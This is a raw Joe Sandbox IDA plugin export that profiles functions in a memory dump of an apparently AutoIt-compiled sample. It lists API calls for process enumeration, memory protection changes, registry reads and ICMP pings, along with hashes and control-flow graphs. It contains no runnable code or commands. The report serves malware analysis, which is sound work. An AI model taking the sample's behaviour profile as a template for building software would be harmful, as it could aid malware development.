                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                • Opcode ID: 15ef0822894cc88df56cb3978ba4f219b97fbcf7bb7c93045f6b750b9bedaf35
                                                                                                                                                                                                                                                                • Instruction ID: b3665363fd9a8cd54fb8d8a251e67612e8c65c260881fc5a49d5c505a8270984
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ef0822894cc88df56cb3978ba4f219b97fbcf7bb7c93045f6b750b9bedaf35
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 233170310593959FC305FF64DA818EFBBE8BE95300F404E6DF4D5821A1EB21DA09CB62
                                                                                                                                                                                                                                                                Function 00A8DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00A8DDAC
                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00A8DDBA
                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00A8DDDA
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A8DE87
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                                                • Opcode ID: d0da52f53318e0a7ae165a88b03550c31d7c2894152defe603cafabc2b6d45d5
                                                                                                                                                                                                                                                                • Instruction ID: 49357bf7dc5e0ec31c17caf7e8437aebd91d3880fe6d1a0a0d45f39d17c4a51d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0da52f53318e0a7ae165a88b03550c31d7c2894152defe603cafabc2b6d45d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F73186711083019FD311EF54DD85AAFBBE8AF95354F04093DF581871A1EB71D945CB92
                                                                                                                                                                                                                                                                Function 00A3FFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                • Instruction ID: ca1b1ed867d273aaee67aa57069e0de674e4456573f2ad0cf384ce330a760e27
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B31CF79A00105DFC718CF58D480E69FBB6FBD9300B2486A9E50ACB656D732EDC1EB80
                                                                                                                                                                                                                                                                Function 00A2EE4C Relevance: 21.6, APIs: 14, Instructions: 614windowsleeptimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetInputState.USER32 ref: 00A2EF07
                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 00A2F107
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A2F228
                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00A2F27B
                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00A2F289
                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A2F29F
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00A2F2B1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                • Opcode ID: cb7e642adc664b765a05f00c4eb629228f80cb9ac943bfc45360f9f9acfd666f
                                                                                                                                                                                                                                                                • Instruction ID: a4aad2239abaf0a163791d8d0df080d083a6b040146cd2e8e2b338d8b6418c00
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb7e642adc664b765a05f00c4eb629228f80cb9ac943bfc45360f9f9acfd666f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3532F471608311EFDB28CB28D844FAAB7F5BF85304F14863DE559872A2D771E985CB82
                                                                                                                                                                                                                                                                Function 00A23624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00A23657
                                                                                                                                                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00A23681
                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A23692
                                                                                                                                                                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00A236AF
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A236BF
                                                                                                                                                                                                                                                                • LoadIconW.USER32(000000A9), ref: 00A236D5
                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A236E4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                • Opcode ID: daacaf055ada46ad7bef95f32f42b1e0203b7b9cfec153fca07ed49aa4c5c9f3
                                                                                                                                                                                                                                                                • Instruction ID: ab360adec8b2a5d566fa7afb02158116093cc33f7c8223939be4b860c2c82879
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daacaf055ada46ad7bef95f32f42b1e0203b7b9cfec153fca07ed49aa4c5c9f3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5621C3B5D01219AFDB00DFE4E889BEDBBB8FB08710F10421AF511A72A1E7B54586CF90
                                                                                                                                                                                                                                                                Function 00A609DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 366 a609db-a60a0b call a607af 369 a60a26-a60a32 call a55594 366->369 370 a60a0d-a60a18 call a4f636 366->370 376 a60a34-a60a49 call a4f636 call a4f649 369->376 377 a60a4b-a60a94 call a6071a 369->377 375 a60a1a-a60a21 call a4f649 370->375 386 a60cfd-a60d03 375->386 376->375 384 a60a96-a60a9f 377->384 385 a60b01-a60b0a GetFileType 377->385 388 a60ad6-a60afc GetLastError call a4f613 384->388 389 a60aa1-a60aa5 384->389 390 a60b53-a60b56 385->390 391 a60b0c-a60b3d GetLastError call a4f613 CloseHandle 385->391 388->375 389->388 395 a60aa7-a60ad4 call a6071a 389->395 393 a60b5f-a60b65 390->393 394 a60b58-a60b5d 390->394 391->375 405 a60b43-a60b4e call a4f649 391->405 398 a60b69-a60bb7 call a554dd 393->398 399 a60b67 393->399 394->398 395->385 395->388 408 a60bc7-a60beb call a604cd 398->408 409 a60bb9-a60bc5 call a6092b 398->409 399->398 405->375 416 a60bfe-a60c41 408->416 417 a60bed 408->417 409->408 415 a60bef-a60bf9 call a58a2e 409->415 415->386 418 a60c62-a60c70 416->418 419 a60c43-a60c47 416->419 417->415 423 a60c76-a60c7a 418->423 424 a60cfb 418->424 419->418 422 a60c49-a60c5d 419->422 422->418 423->424 425 a60c7c-a60caf CloseHandle call a6071a 423->425 424->386 428 a60ce3-a60cf7 425->428 429 a60cb1-a60cdd GetLastError call a4f613 call a556a6 425->429 428->424 429->428
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A6071A: CreateFileW.KERNEL32(00000000,00000000,?,00A60A84,?,?,00000000,?,00A60A84,00000000,0000000C), ref: 00A60737
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A60AEF
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A60AF6
                                                                                                                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 00A60B02
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A60B0C
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A60B15
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A60B35
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A60C7F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A60CB1
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00A60CB8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                • Opcode ID: 6a7011f312a714790d1585a9dcaa4fa4b159d50f41e64acd50f3e3764f4d4f84
                                                                                                                                                                                                                                                                • Instruction ID: 6666e3683e26c1e437ea93b721ef7f344c3f3fe3c66b36e8c298d2165ffe06be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a7011f312a714790d1585a9dcaa4fa4b159d50f41e64acd50f3e3764f4d4f84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FA11332A141488FDF19EFB8D852FAE7BB1AB06324F144259F811DB2E2DB319D52CB51
                                                                                                                                                                                                                                                                Function 00A252A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00A255B2
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A2525A
                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A253C4
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A64BFD
                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A64C3E
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00A64C80
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A64CE7
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A64CF6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                • Opcode ID: f16fa027d1714ba68280f0cf98733eb1f9b6446aeb554e5bf30f9b2ef0061290
                                                                                                                                                                                                                                                                • Instruction ID: 27522621e83a8db0e91cb1a22887724004b7461738b0e0f781ee2b9bf115a576
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f16fa027d1714ba68280f0cf98733eb1f9b6446aeb554e5bf30f9b2ef0061290
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A717F725053119FC704EFA9E9819ABBBF8FF98340F40452EF5418B161EB71DA4ACB91
                                                                                                                                                                                                                                                                Function 00A234D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00A234DE
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00A234ED
                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000063), ref: 00A23503
                                                                                                                                                                                                                                                                • LoadIconW.USER32(000000A4), ref: 00A23515
                                                                                                                                                                                                                                                                • LoadIconW.USER32(000000A2), ref: 00A23527
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A2353F
                                                                                                                                                                                                                                                                • RegisterClassExW.USER32(?), ref: 00A23590
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: GetSysColorBrush.USER32(0000000F), ref: 00A23657
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: RegisterClassExW.USER32(00000030), ref: 00A23681
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A23692
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: InitCommonControlsEx.COMCTL32(?), ref: 00A236AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A236BF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: LoadIconW.USER32(000000A9), ref: 00A236D5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A236E4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                • Opcode ID: e686b679d4864215787f34f4c2b97584f442f308c7006ead24d8460bc98416fd
                                                                                                                                                                                                                                                                • Instruction ID: d375de730964e7b8d85bf6e62d4de4158f02a67f9d55046151686538f0b364bb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e686b679d4864215787f34f4c2b97584f442f308c7006ead24d8460bc98416fd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 422133B5D00315ABDB10DFD5EC59BA9BFB4FB08750F00422AF604AB261D7B94546CF90
                                                                                                                                                                                                                                                                Function 00AA0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 507 aa0fb8-aa0fef call a2e6a0 510 aa100f-aa1021 WSAStartup 507->510 511 aa0ff1-aa0ffe call a2c98d 507->511 512 aa1023-aa1031 510->512 513 aa1054-aa1091 call a3c1f6 call a28ec0 call a3f9d4 inet_addr gethostbyname 510->513 511->510 522 aa1000-aa100b call a2c98d 511->522 515 aa1033 512->515 516 aa1036-aa1046 512->516 530 aa10a2-aa10b0 513->530 531 aa1093-aa10a0 IcmpCreateFile 513->531 515->516 519 aa104b-aa104f 516->519 520 aa1048 516->520 523 aa1249-aa1251 519->523 520->519 522->510 533 aa10b2 530->533 534 aa10b5-aa10c5 530->534 531->530 532 aa10d3-aa1100 call a4017b call a2423c 531->532 543 aa112b-aa1148 IcmpSendEcho 532->543 544 aa1102-aa1129 IcmpSendEcho 532->544 533->534 535 aa10ca-aa10ce 534->535 536 aa10c7 534->536 538 aa1240-aa1244 call a2bd98 535->538 536->535 538->523 545 aa114c-aa114e 543->545 544->545 546 aa11ae-aa11bc 545->546 547 aa1150-aa1155 545->547 548 aa11be 546->548 549 aa11c1-aa11c8 546->549 550 aa115b-aa1160 547->550 551 aa11f8-aa120a call a2e6a0 547->551 548->549 553 aa11e4-aa11ed 549->553 554 aa11ca-aa11d8 550->554 555 aa1162-aa1167 550->555 562 aa120c-aa120e 551->562 563 aa1210 551->563 559 aa11ef 553->559 560 aa11f2-aa11f6 553->560 557 aa11da 554->557 558 aa11dd 554->558 555->546 561 aa1169-aa116e 555->561 557->558 558->553 559->560 564 aa1212-aa1229 IcmpCloseHandle WSACleanup 560->564 565 aa1193-aa11a1 561->565 566 aa1170-aa1175 561->566 562->564 563->564 564->538 570 aa122b-aa123d call a4013d call a40184 564->570 568 aa11a3 565->568 569 aa11a6-aa11ac 565->569 566->554 567 aa1177-aa1185 566->567 571 aa118a-aa1191 567->571 572 aa1187 567->572 568->569 569->553 570->538 571->553 572->571
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000101,?), ref: 00AA1019
                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?), ref: 00AA1079
                                                                                                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 00AA1085
                                                                                                                                                                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00AA1093
                                                                                                                                                                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AA1123
                                                                                                                                                                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AA1142
                                                                                                                                                                                                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 00AA1216
                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 00AA121C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                • String ID: Ping
                                                                                                                                                                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                • Opcode ID: 21bb3cb2233101347a1ffdcdce9d4699c19a7fe2feff1ab24e5b5f2d23879f5b
                                                                                                                                                                                                                                                                • Instruction ID: 895937052ad1a1f9bc0a8ae7734024ef38e89da0b89afce668cd2d7035d6fd55
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21bb3cb2233101347a1ffdcdce9d4699c19a7fe2feff1ab24e5b5f2d23879f5b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1391AF31604241AFD720DF59C988F16BBE0EF49318F1486ADF5698B6A2D731ED86CB81
                                                                                                                                                                                                                                                                Function 00A2370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
